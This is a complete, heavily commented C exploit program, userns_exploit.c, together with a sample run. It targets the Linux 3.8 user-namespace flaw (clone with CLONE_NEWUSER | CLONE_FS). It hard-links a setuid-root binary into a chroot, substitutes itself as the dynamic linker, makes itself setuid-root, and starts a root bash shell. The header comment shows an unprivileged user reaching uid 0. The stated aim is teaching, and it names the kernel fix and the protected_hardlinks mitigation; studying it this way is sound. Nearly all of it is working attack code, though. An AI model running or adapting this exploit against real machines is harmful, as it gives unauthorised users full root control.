/*The program below demonstrates a security vulnerability in the Linux 3.8 implementation of user namespaces. That vulnerability is already fixed in Linux 3.9 (and stable kernel 3.8.3). The following shell script shows an example run of this program:
 
    $ uname -sr
    Linux 3.8.0
    $ cc -static -Wall userns_exploit.c -o userns_exploit
    $ cp userns_exploit /tmp        # On same filesystem as /bin/fusermount
    $ cd /tmp
    $ ls -l --numeric-uid-gid --inode /bin/fusermount /tmp/userns_exploit |
        awk '{printf "%6d %s %5d %5d  %s\n", $1, $2, $4, $5, $NF}'
    172255 -rwsr-xr-x.     0     0  /bin/fusermount
      8169 -rwxr-xr-x.  1000  1000  /tmp/userns_exploit
    $ ./userns_exploit /bin/fusermount
    PID 18583: / inode is 2
    PID 18583: path of this executable is: '/tmp/userns_exploit'
    PID 18583: waiting for "/tmp/userns_exploit" to become setuid-root
            PID 18584: child continues after fork()
            PID 18584: setting up chroot directory tree
            PID 18584: link("/bin/fusermount", "chroot/suid-root")
            PID 18584: link("/tmp/userns_exploit", "chroot/lib64/ld-linux-x86-64.so.2")
            PID 18584: created chroot tree:
                    172255  755 s     0     0  chroot/suid-root
                      8169  755    1000  1000  chroot/lib64/ld-linux-x86-64.so.2
            PID 18584: clone() returned PID = 18594
            PID 18584: calling waitpid()
                    PID 18594: clone child started
                    PID 18594: / inode is 2
                    PID 18594: finished chroot()
                    PID 18594: / inode is 788413 (chrooted)
                    PID 18594: exiting
            PID 18584: waitpid() complete
            PID 18584: / inode is 788413 (chrooted)
            PID 18584: execve a set-user-ID root program: /suid-root
            PID 18584:         ... passes control to dynamic linker (PHASE 2)
            PID 18584: PHASE 2 =====> execed with geteuid() == 0 && argc == 1
            PID 18584: / inode is 788413 (chrooted)
            PID 18584: make /lib64/ld-linux-x86-64.so.2 setuid-root
            PID 18584: state of chroot tree:
                    172255  755 s     0     0  ./suid-root
                      8169  755 s     0     0  ./lib64/ld-linux-x86-64.so.2
            PID 18584: exiting
    PID 18583: "/tmp/userns_exploit" is now setuid-root
    PID 18583: / inode is 2
    PID 18583: execve(/tmp/userns_exploit) (starts PHASE 3)
    PID 18583: PHASE 3 =====> execed with geteuid() == 0 && argc == 2
    PID 18583: / inode is 2
    PID 18583: rUID: 1000   eUID: 0  
    PID 18583: calling setuid(0)
    PID 18583: rUID: 0      eUID: 0  
    PID 18583: / inode is 2
    PID 18583: execve: /bin/bash
    bash$ id -u
    0
 
At the end of the above output, we see that a bash shell has been fired up, and the effective ID of the shell is 0. An unprivileged user has gained full root privileges.
*/
/* userns_exploit.c
 
   (C) Copyright 2013, Michael Kerrisk
 
   Licensed under the GNU General Public License version 2 or later.
 
   This program is very much inspired by Sebastian Krahmer's
   clown-newuser.c. Sebastian did all the heavy intellectual lifting.
   This program conducts the same exploit, but does so in well commented
   and well instrumented form, to ease understanding of what goes on.
 
   Sebastian's original program can be found at
   http://stealth.openwall.net/xSports/clown-newuser.c
   and his blog post on the exploit can be found at
   http://c-skills.blogspot.de/2013/03/clonenewuser-trickery.html
 
   The basis of the exploit is that Linux 3.8 allows the combination
   clone(CLONE_NEWUSER | CLONE_FS), which creates a situation where two
   processes are in different user namespaces but share their root
   directory attribute. By executing an arbitrary set-user-ID-root program
   (i.e., not one over whose operation we have any control) and employing
   some chroot(2) trickery, we can engineer a situation where *this*
   program is executed as the dynamic linker for the set-user-ID-root
   program. This leads to full root escalation from an unprivileged login.
 
   Linux 3.9 closes this loophole by denying
   clone(CLONE_NEWUSER | CLONE_FS). The loophole is also closed in stable
   kernel 3.8.3.
 
   This program must be statically linked against glibc:

        cc -static -Wall userns_exploit.c -o userns_exploit
*/
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <sched.h>
#include <stdarg.h>
#include <fcntl.h>
#include <string.h>
#include <limits.h>
#include <errno.h>
#include <ftw.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/stat.h>
 
/* Print 'msg' followed by the description of the current errno value
   (via perror()) and terminate the process with EXIT_FAILURE. The
   do { } while (0) wrapper makes the macro usable as a single statement. */

#define errExit(msg)    do { perror(msg); exit(EXIT_FAILURE); \
                           } while (0)

/* Environment of this process; handed on to execve() in main() */

extern char **environ;

/* Statically allocated stack for the child created with clone() */

#define STACK_SIZE (1024 * 1024)
static char child_stack[STACK_SIZE];
 
/* Write a log message to stdout. The output starts with 'prefix'
   (callers use it for indentation) and the PID of the calling process,
   followed by the printf()-style message described by 'format' and the
   arguments after it. No newline is appended; callers supply their own. */

static void
logmsg(char *prefix, const char *format, ...)
{
    va_list ap;
    long self = (long) getpid();

    fprintf(stdout, "%sPID %ld: ", prefix, self);

    va_start(ap, format);
    vfprintf(stdout, format, ap);
    va_end(ap);
}
 
/* Log the inode number of the caller's root directory, indented with
   'prefix', and flag whether the caller appears to be inside a chroot
   jail. Terminates the process if "/" cannot be stat()ed. */

static void
display_status(char *prefix)
{
    struct stat root_sb;
    int in_jail;

    if (stat("/", &root_sb) == -1)
        errExit("stat");

    /* This check assumes that the true root directory has inode 2;
       any other inode number for "/" is taken to mean that we are
       inside a chroot jail, and a string indicating that is printed. */

    in_jail = (root_sb.st_ino != 2);

    logmsg(prefix, "/ inode is %ld", (long) root_sb.st_ino);
    if (in_jail)
        fputs(" (chrooted)", stdout);
    putchar('\n');
}
 
/* Called by nftw() for each node in a directory subtree. For regular
   files, display the following information: inode number, permissions
   (octal), set-user-ID flag, UID, GID, and pathname. Other file types
   are skipped silently.

   'pathname' and 'sb' describe the node being visited; 'type' and
   'ftwb' are part of the nftw() callback signature but are not used.

   Always returns 0, which tells nftw() to continue the traversal. */

static int
traverse_file(const char *pathname, const struct stat *sb, int type,
                      struct FTW *ftwb)
{
    (void) type;
    (void) ftwb;

    /* uid_t, gid_t and mode_t have implementation-defined widths and
       signedness, so cast each value to the exact type that its
       conversion specifier expects. */

    if (S_ISREG(sb->st_mode)) {
        printf("\t\t%6ld  %3o %c %5ld %5ld  %s\n",
                (long) sb->st_ino, (unsigned int) (sb->st_mode & 0777),
                (sb->st_mode & S_ISUID) ? 's' : ' ',
                (long) sb->st_uid, (long) sb->st_gid, pathname);
    }

    return 0;                   /* Tell nftw() to continue */
}
 
/* Traverse the directory tree rooted at 'path', displaying information
   about the regular files in the tree (see traverse_file()).

   The listing is purely informational, so a failed traversal is
   reported on stderr but does not terminate the program. */

static void
display_file_tree(char *path)
{
    /* 20 is the maximum number of directories that nftw() may hold
       open simultaneously; no traversal flags are set. */

    if (nftw(path, traverse_file, 20, 0) == -1)
        perror("nftw");
}
 
/* Start function for the child created by clone(); 'arg' is unused.

   The child changes directory into "chroot" and then calls chroot()
   on it. Because the child was created with CLONE_FS, the root
   directory of the parent process is changed as well. The parent,
   however, is still in the initial user namespace; therefore if it
   executes a set-user-ID-0 program, it will get an effective UID of 0.

   Returns 0 on success; terminates the child with a failure status
   if chdir() or chroot() fails. */

static int
clone_child(void *arg)
{
    char *indent = "\t\t";

    (void) arg;

    usleep(10000);      /* Just avoid confused intermingling of output */
    logmsg(indent, "clone child started\n");
    display_status(indent);

    /* Switch the root directory. The parent process sees this change
       too, since it shares the root directory attribute. */

    if (chdir("chroot") == -1)
        errExit("chdir");
    if (chroot(".") == -1)
        errExit("chroot");

    logmsg(indent, "finished chroot()\n");
    display_status(indent);

    logmsg(indent, "exiting\n");
    return 0;
}
 
/* Create a chroot file tree in the directory "chroot" under the
   current working directory.

   'self_path' is the pathname of this program.
   'suid_path' is the path of an arbitrary set-user-ID-root program
   on the system.

   Any failure (including "chroot" already existing) terminates the
   process: the later steps cannot work with an incomplete tree. */

static void
create_chroot_tree(const char *self_path, char *suid_path)
{
    logmsg("\t", "setting up chroot directory tree\n");

    /* Create directories */

    if (mkdir("chroot", 0755) == -1)
        errExit("mkdir 1");
    if (mkdir("chroot/lib64", 0755) == -1)
        errExit("mkdir 2");

    /* Link an arbitrary set-user-ID-root executable ('suid_path')
       to a location inside the tree.

       Note that this link() call will fail on systems where the
       /proc/sys/fs/protected_hardlinks file is set nonzero. That
       setting is designed to prevent exploits like this one. The
       default value in this file is 0 on vanilla kernels, but
       some distributions set it nonzero by default.

       The link() call will also fail if the two pathnames
       are on different file systems. Nothing new there,
       but it's an easy error to encounter when trying to link
       to set-user-ID-root programs in /usr/bin, for example.

       Without this link there is nothing for the caller to execute
       later on, so treat failure as fatal, like every other step
       in this function. */

    logmsg("\t", "link(\"%s\", \"chroot/suid-root\")\n", suid_path);
    if (link(suid_path, "chroot/suid-root") == -1)
        errExit("link suid_path");

    /* Within the chroot directory, link this executable to
       /lib64/ld-linux-x86-64.so.2, the path where the 'suid-root'
       program will look for a dynamic linker.  (This pathname is
       architecture dependent; here we assume x86-64.) */

    logmsg("\t", "link(\"%s\", \"chroot/lib64/ld-linux-x86-64.so.2\")\n",
            self_path);
    if (link(self_path, "chroot/lib64/ld-linux-x86-64.so.2") == -1)
        errExit("link self_path");

    /* For informational purposes, show the resulting chroot tree */

    logmsg("\t", "created chroot tree:\n");
    display_file_tree("chroot");
}
 
/* Prepare the exploit. Create and populate a directory tree to be used
   as a chroot jail. Then create a clone child that is in a different
   user namespace but shares the root directory attribute. That
   child will then do a chroot() into the jail; that chroot()
   call will also affect the caller of clone().

   'self_path' is the pathname of this program and 'suid_path' the
   pathname of a set-user-ID-root program; both are handed on to
   create_chroot_tree().

   The process is terminated if any step fails, including the case
   where the clone child does not exit successfully. */

static void
prepare_the_exploit(char *self_path, char *suid_path)
{
    pid_t pid;
    int status;

    create_chroot_tree(self_path, suid_path);

    /* Create a clone() child that resides in a new user namespace but
       shares the filesystem information (root directory, current working
       directory, umask) with the parent process. The stack pointer
       passed to clone() is the top of 'child_stack'. */

    pid = clone(clone_child, child_stack + sizeof(child_stack),
                CLONE_NEWUSER | CLONE_FS | SIGCHLD, NULL);
    if (pid == -1)
        errExit("clone");

    logmsg("\t", "clone() returned PID = %ld\n", (long) pid);

    /* Wait for child to finish its work and terminate */

    logmsg("\t", "calling waitpid()\n");
    if (waitpid(pid, &status, 0) == -1)
        errExit("waitpid");
    logmsg("\t", "waitpid() complete\n");

    /* The child exits with a nonzero status if its chdir() or chroot()
       failed. In that case our root directory was not changed, and
       there is no point in carrying on. */

    if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) {
        fprintf(stderr, "clone child did not complete successfully\n");
        exit(EXIT_FAILURE);
    }
}
 
/* Program entry point.

   Usage (as typed by the user): prog <path-of-set-user-ID-root-program>

   The program is executed three times in all; the effective UID and
   'argc' on entry select which of the three phases is carried out
   (see the comments on each branch below). */

int
main(int argc, char *argv[])
{

    setbuf(stdout, NULL);       /* Make stdout unbuffered */

    /* In all, this program will be executed three times, once for each
       branch in the following if () {} else if () {} else {}.
       The if-logic distinguishes the three phases of the exploit. */

    if (geteuid() != 0) {

        /* PHASE 1: We are in the initial user namespace,
           and have no privileges.

           Do a fork() to create parent and child processes.

           The child prepares the exploit, and then executes a
           set-user-ID-root program that has been hard linked into
           a chroot jail. The environment of that program has been
           engineered so that instead of executing the true dynamic
           linker, it instead executes a program of our own choosing:
           we'll choose this program as the dynamic linker.
           Consequently, this program will run with true UID 0 (full
           privileges), and will carry out PHASE 2 of the exploit.

           Meanwhile the parent sits in a loop waiting until this
           executable file is made set-user-ID-root (a step performed
           by PHASE 2), and then re-executes the executable. */

        char self_path[PATH_MAX];
        ssize_t path_len;
        pid_t pid;

        /* The set-user-ID-root program to use is named by argv[1] */

        if (argc < 2) {
            fprintf(stderr, "Usage: %s <set-user-ID-root-program>\n",
                    (argc > 0) ? argv[0] : "userns_exploit");
            exit(EXIT_FAILURE);
        }

        display_status("");

        /* Introspect via /proc/self/exe to obtain pathname of
           executable being run in this process. readlink() does not
           null-terminate its result, so reserve one byte and add the
           terminator ourselves. */

        path_len = readlink("/proc/self/exe", self_path,
                            sizeof(self_path) - 1);
        if (path_len == -1)
            errExit("readlink");
        self_path[path_len] = '\0';

        logmsg("", "path of this executable is: '%s'\n", self_path);

        pid = fork();
        if (pid == -1)
            errExit("fork");

        if (pid == 0) {         /* Child */

            char *suid_argv[] = { "/suid-root", NULL };
            char *empty_env[] = { NULL };

            logmsg("\t", "child continues after fork()\n");

            prepare_the_exploit(self_path, argv[1]);

            /* At this point, we are inside the chroot jail (because the
               clone child did a chroot() and the two processes share the
               root directory attribute). Now execute a set-user-ID-root
               program. Since we are in the *initial* user namespace
               the program will gain the true UID 0. Even though we didn't
               have any special control of the set-user-ID-root program,
               we have put it in a chroot environment where we *do* control
               the dynamic linker that it will employ. That dynamic linker
               is another instance of this program, executed with
               different command-line arguments--it will be run as true
               UID 0. This is the critical step in gaining root
               privileges on the system. */

            display_status("\t");

            logmsg("\t", "execve a set-user-ID root program: %s\n",
                    suid_argv[0]);
            logmsg("\t", "\t... passes control to dynamic linker (PHASE 2)\n");

            /* Run the program with an empty environment. An explicit
               empty list is used rather than a NULL 'envp', which is
               a nonportable Linux extension. */

            execve(suid_argv[0], suid_argv, empty_env);
            errExit("execve");

        } else {                /* Parent */

            /* The parent has a distinct root directory attribute from the
               child and the clone child, and so is unaffected by the
               chroot() call in the clone child. */

            char *self_argv[] = { self_path, "1", NULL };
            struct stat sb;
            int child_gone = 0;

            /* Wait until the pathname of the executable being run by this
               program has been made set-user-ID-root, then execute it. */

            logmsg("", "waiting for \"%s\" to become setuid-root\n",
                    self_path);

            for (;;) {  /* Poll file state at intervals */
                pid_t reaped;

                if (stat(self_path, &sb) == -1)
                    errExit("stat");
                if (sb.st_uid == 0 && (sb.st_mode & S_ISUID))
                    break;

                /* If the child has already terminated and the file has
                   still not changed, it never will: give up rather
                   than polling forever. */

                if (child_gone) {
                    fprintf(stderr, "Child terminated without making "
                            "\"%s\" setuid-root\n", self_path);
                    exit(EXIT_FAILURE);
                }

                reaped = waitpid(pid, NULL, WNOHANG);
                if (reaped == -1)
                    errExit("waitpid");

                if (reaped == pid)
                    child_gone = 1;     /* Check the file one last time */
                else
                    usleep(10000);
            }

            logmsg("", "\"%s\" is now setuid-root\n", self_path);
            display_status("");

            /* Now reexecute this program; since the executable
               is now set-user-ID-root, we now gain full root privileges. */

            logmsg("", "execve(%s) (starts PHASE 3)\n", self_path);

            execve(self_path, self_argv, environ);
            errExit("execve");
        }

    } else if (geteuid() == 0 && argc == 1) {

        /* PHASE 2:
           We are inside the chroot jail, running with true UID 0.

           We can't break out of the jail, but since we are true UID 0,
           we can create a set-user-ID-root executable. We make the dynamic
           linker inside the jail set-user-ID-root and then terminate.
           During PHASE 1, the dynamic linker path was created as a link
           to this executable, so this step has the effect of making
           that executable (which is *outside* the chroot jail)
           set-user-ID-root. */

        logmsg("\t", "PHASE 2 =====> "
                "execed with geteuid() == 0 && argc == 1\n");

        display_status("\t");
        logmsg("\t", "make /lib64/ld-linux-x86-64.so.2 setuid-root\n");

        /* The pathnames are relative: they are resolved against the
           current working directory of this process. */

        if (chown("lib64/ld-linux-x86-64.so.2", 0, 0) == -1)
            errExit("chown");
        if (chmod("lib64/ld-linux-x86-64.so.2", 04755) == -1)
            errExit("chmod");

        /* For informational purposes, redisplay the file tree in
           the chroot jail, so that we can see the changes that have
           been wrought. */

        logmsg("\t", "state of chroot tree:\n");
        display_file_tree(".");

        logmsg("\t", "exiting\n");
        exit(EXIT_SUCCESS);

    } else {

        /* PHASE 3:
           We are outside the chroot jail, inside the initial user
           namespace, running with true UID 0. All the hard work has
           been done; all we need now is a shell running as root. */

        char *shell_argv[] = { "/bin/bash", NULL };

        /* Sanity check: the program logic dictates that our
           effective UID must be zero here, but double check.
           Ending up here with any other UID is an error, so report
           failure to the caller. */

        if (geteuid() != 0) {
            fprintf(stderr, "Unexpected execution environment\n");
            exit(EXIT_FAILURE);
        }

        logmsg("", "PHASE 3 =====> "
                "execed with geteuid() == 0 && argc == %d\n", argc);

        display_status("");

        /* At this stage, we have an effective user ID of 0, but our
           real user ID is still nonzero. Many shells (rightly) view
           that constellation with suspicion, and when they detect
           it on start-up, they reset the effective UID to be the
           same as the real UID. bash(1) is no exception. Therefore,
           we have to ensure that the real user ID is also made 0
           before executing bash. */

        logmsg("", "rUID: %-4ld   eUID: %-4ld\n",
                (long) getuid(), (long) geteuid());

        logmsg("", "calling setuid(0)\n");

        if (setuid(0) == -1)
            errExit("setuid");

        logmsg("", "rUID: %-4ld   eUID: %-4ld\n",
                (long) getuid(), (long) geteuid());
        display_status("");

        /* Now we can run a full shell as root */

        logmsg("", "execve: %s\n", shell_argv[0]);

        execve(shell_argv[0], shell_argv, environ);
        errExit("execve");
    }
}